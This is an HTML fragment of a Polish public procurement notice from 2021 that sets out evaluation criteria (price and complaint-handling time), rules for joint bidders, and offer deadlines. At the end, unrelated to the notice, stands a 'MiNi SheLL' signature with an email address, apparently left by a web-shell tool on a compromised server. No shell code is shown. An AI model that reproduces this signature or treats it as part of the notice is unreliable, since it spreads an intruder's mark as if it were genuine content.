reklamacji<br/>40 %<br/><br/><br/> 1. Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/> 2. Kryterium: termin realizacji reklamacji - waga kryterium 40% zostanie wyliczony na podstawie następującego zestawienia:<br/>B =<br/>- do 24h – 40 pkt<br/>- do 36h – 20 pkt<br/>- do 48h – 10 pkt<br/>Sposób oceny: minimalizacja<br/>Zamawiający określa przedział czasowy obejmujący akceptowalny czas terminu realizacji reklamacji/zastrzeżeń zgłoszonych wykonawcy w zakresie dostarczonego towaru, jego jakości lub ilości towarów. Wykonawca winien w ofercie podać termin realizacji reklamacji od momentu ich zgłoszenia do 24, 36, 48 godzin. Wykonawca winien podać ilość godzin, np. 24 (liczba całkowita), która zostanie wpisana do umowy. W przypadku braku wpisania w formularzu cenowym przez wykonawcę terminu realizacji reklamacji, zamawiający przyjmuje w celu oceny danej oferty maksymalny termin realizacji reklamacji od momentu ich zgłoszenia tj. 48 godzin. Termin realizacji reklamacji określony w ofercie wykonawcy powyżej 48 godzin zostanie oceniony na 0 pkt., natomiast termin realizacji reklamacji poniżej 24 godzin zostanie oceniony jak dla 24 godzin, tj. 40 pkt.<br/>Całkowitą ilość punktów oferty wylicza się z poniższego wzoru:<br/>C = A + B<br/>gdzie,<br/>C = całkowita ilość punktów przyznana ofercie (maksymalnie 100 pkt)<br/>A = liczba punktów przyznana za kryterium CENA (maksymalnie 60 pkt)<br/>B = liczba punktów przyznana za kryterium TERMIN REALIZACJI REKLAMACJI (maksymalnie 40 pkt)<br/><br/> 3. Sposób oceny: Zamawiający udzieli zamówienia wykonawcy, którego oferta nie będzie podlegała odrzuceniu i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria. Łączna maksymalna liczba punktów, którą może otrzymać oferta wynosi 100. Ilość punktów zostanie określona z dokładnością do drugiego miejsca po przecinku. O wyborze wykonawcy zamawiający niezwłocznie zawiadomi uczestników postępowania, którzy ubiegali się o udzielenie zamówienia.<br/> 4. Ocenie będą podlegały wyłącznie oferty niepodlegające odrzuceniu.<br/> 5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ich<br/>oferta musi spełniać następujące wymagania:<br/>5.1. wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanowią pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – załączają do oferty<br/>pełnomocnictwo,<br/>5.2. pełnomocnictwo składa się w oryginale lub kopii poświadczonej notarialnie,<br/>5.3. przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia,<br/>5.4. każdy z wykonawców, wspólnie ubiegających się o zamówienie zobowiązany jest złożyć<br/>oświadczenia o braku podstaw do wykluczenia,<br/>5.5. żaden z Wykonawców nie może podlegać wykluczeniu z powodu przesłanek, o których<br/>Ogłoszenie nr 2021/BZP 00274297/01 z dnia 2021-11-18<br/>2021-11-18 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>mowa w art. 108 ust. 1 ustawy Pzp, 6) wszelka korespondencja będzie prowadzona wyłącznie z<br/>pełnomocnikiem,<br/>5.6. zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego<br/>umowy regulującej współpracę wykonawców występujących wspólnie,<br/>5.7. wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy – załącznik nr 3 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniPortal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com